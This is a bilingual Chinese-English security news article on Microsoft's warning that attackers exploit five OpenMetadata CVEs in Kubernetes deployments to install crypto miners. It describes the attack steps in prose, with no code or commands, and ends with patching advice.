微軟警告：網路犯罪分子利用 OpenMetadata 缺陷來挖掘加密貨幣

3 月披露的未修補的 OpenMetadata 漏洞正在被惡意行為者積極利用，以獲取對 Kubernetes 環境的存取權限並安裝加密挖掘惡意軟體。這些漏洞允許攻擊者繞過身份驗證、獲得遠端程式碼執行並竊取 AWS 憑證以在受害者的資源上挖掘加密貨幣。 Microsoft 建議管理員將 OpenMetadata 映像更新到最新版本並實施強式驗證以減輕這些風險。

Cybercriminals Exploit OpenMetadata Vulnerabilities to Mine Cryptocurrency, Microsoft Warns

微軟警告網路犯罪分子利用 OpenMetadata 漏洞挖掘加密貨幣

In a chilling exposé, Microsoft has unveiled a disturbing trend: cybercriminals are actively exploiting vulnerabilities in OpenMetadata, an open-source software suite, to mine cryptocurrency at the expense of unsuspecting victims. These exploits, which have been ongoing since early April, are targeting Kubernetes environments where OpenMetadata is deployed without the necessary security patches.

在一次令人不寒而慄的曝光中，微軟揭露了一個令人不安的趨勢：網路犯罪分子正在積極利用開源軟體套件 OpenMetadata 中的漏洞來挖掘加密貨幣，而犧牲毫無戒心的受害者的利益。這些漏洞自 4 月初以來一直在持續，目標是部署 OpenMetadata 且沒有必要的安全性修補程式的 Kubernetes 環境。

Unpatched OpenMetadata Systems: A Gateway for Malicious Actors

未打補丁的開放元資料系統：惡意行為者的門戶

OpenMetadata vulnerabilities, disclosed in March, encompass a range of critical and high-severity flaws that can be exploited to bypass authentication and gain remote code execution (RCE) within OpenMetadata deployments. Microsoft's threat intelligence team has identified five specific CVEs that are being leveraged in these attacks:

3 月揭露的 OpenMetadata 漏洞包含一系列關鍵和高嚴重性缺陷，可利用這些缺陷繞過身份驗證並在 OpenMetadata 部署中獲得遠端程式碼執行 (RCE)。 Microsoft 的威脅情報團隊已確定這些攻擊中利用的五個特定 CVE：

• CVE-2024-28255: Critical improper authentication vulnerability (CVSS: 9.8)
• CVE-2024-28847: High-severity code-injection vulnerability (CVSS: 8.8)
• CVE-2024-28253: Critical code-injection vulnerability (CVSS: 9.4)
• CVE-2024-28848: High-severity code-injection vulnerability (CVSS: 8.8)
• CVE-2024-28254: OS command injection vulnerability (CVSS: 8.8)

These vulnerabilities provide attackers with a gateway into vulnerable systems, allowing them to penetrate OpenMetadata containers and execute malicious commands. The attackers' primary objective is to surreptitiously mine cryptocurrency using the victims' computing resources.

CVE-2024-28255：嚴重的不當身分驗證漏洞（CVSS：9.8）CVE-2024-28847：高嚴重性程式碼注入漏洞（CVSS：8.8）CVE-2024-28253：嚴重的程式碼注入漏洞（CVSS：9.4） CVE -2024-28848：高嚴重性程式碼注入漏洞（CVSS：8.8）CVE-2024-28254：作業系統命令注入漏洞（CVSS：8.8）這些漏洞為攻擊者提供了進入易受攻擊系統的網關，使他們能夠滲透OpenMetadata 容器並執行惡意命令。攻擊者的主要目標是利用受害者的計算資源秘密開採加密貨幣。

The Attack Sequence: A Step-by-Step Account

攻擊序列：逐步說明

The attack sequence begins with attackers scanning for Kubernetes-based deployments of OpenMetadata that are exposed to the internet. Once they identify vulnerable systems, they exploit the unpatched CVEs to gain access to the container. From there, they execute a series of commands to gather intelligence about the victim's environment, including network and hardware configuration, OS version, and active users.

攻擊序列首先由攻擊者掃描暴露在互聯網上的基於 Kubernetes 的 OpenMetadata 部署。一旦他們識別出易受攻擊的系統，他們就會利用未修補的 CVE 來存取容器。從那裡，他們執行一系列命令來收集有關受害者環境的情報，包括網路和硬體配置、作業系統版本和活躍用戶。

"As part of the reconnaissance phase, the attackers read the environment variables of the workload," explained Microsoft security experts Hagai Ran Kestenberg and Yossi Weizman. "Those variables may contain connection strings and credentials for various services used for OpenMetadata operation, which could lead to lateral movement to additional resources."

「作為偵察階段的一部分，攻擊者讀取工作負載的環境變量，」微軟安全專家 Hagai Ran Kestenberg 和 Yossi Weizman 解釋道。 “這些變數可能包含用於 OpenMetadata 操作的各種服務的連接字串和憑證，這可能會導致橫向移動到其他資源。”

Crypto-Malware Deployment and Remote Access

加密惡意軟體部署和遠端存取

Once they have gained a foothold, the attackers download crypto-mining malware from a remote server in China. In some cases, the attackers have even left behind a desperate plea, hoping to evoke sympathy from their victims:

一旦獲得立足點，攻擊者就會從中國的遠端伺服器下載加密貨幣挖礦惡意軟體。在某些情況下，襲擊者甚至留下絕望的懇求，希望引起受害者的同情：

"Hi man. I've seen several organizations report my Trojan recently. Please let me go. I want to buy a car. That's all. I don't want to hurt others. I can't help it. My family is very poor. In China, it's hard to buy a suite. I don't have any accommodation. I don't want to do anything illegal. Really, really if you are interested, you can give me XMR, my address is…"

「嗨，夥計。我最近看到幾個組織報告了我的木馬。請放過我。我想買一輛車。僅此而已。我不想傷害別人。我沒辦法。我的家人很在中國，很難買套房，我不想做任何違法的事情。

It remains unclear whether this sob story has swayed any victims into transferring Monero crypto-coins to the attackers.

目前尚不清楚這個悲慘的故事是否促使受害者將門羅幣轉移給攻擊者。

After deploying the mining malware, the attackers establish a reverse shell connection using Netcat to maintain remote access to the container. Additionally, they install cronjobs for scheduling, ensuring that the malware will execute at predetermined times.

部署挖礦惡意軟體後，攻擊者使用 Netcat 建立反向 shell 連接，以維持對容器的遠端存取。此外，他們還安裝 cronjobs 進行調度，確保惡意軟體在預定時間執行。

Protecting Against Crypto-Mining Exploits

防範加密貨幣挖礦漏洞

Microsoft strongly urges administrators running OpenMetadata workloads in their Kubernetes clusters to ensure that the image is up to date. If OpenMetadata is exposed to the internet, strong authentication measures should be implemented, and default credentials should be avoided.

Microsoft 強烈敦促管理員在其 Kubernetes 叢集中執行 OpenMetadata 工作負載，以確保映像是最新的。如果 OpenMetadata 暴露在網際網路上，則應實施強式驗證措施，並應避免預設憑證。

These vulnerabilities serve as a sobering reminder of the importance of timely security patching and the consequences of neglecting software updates. Organizations are advised to adopt a proactive approach to vulnerability management to mitigate the risks posed by malicious actors.

這些漏洞清醒地提醒我們及時修補安全修補程式的重要性以及忽略軟體更新的後果。建議組織採取主動的漏洞管理方法，以減輕惡意行為者帶來的風險。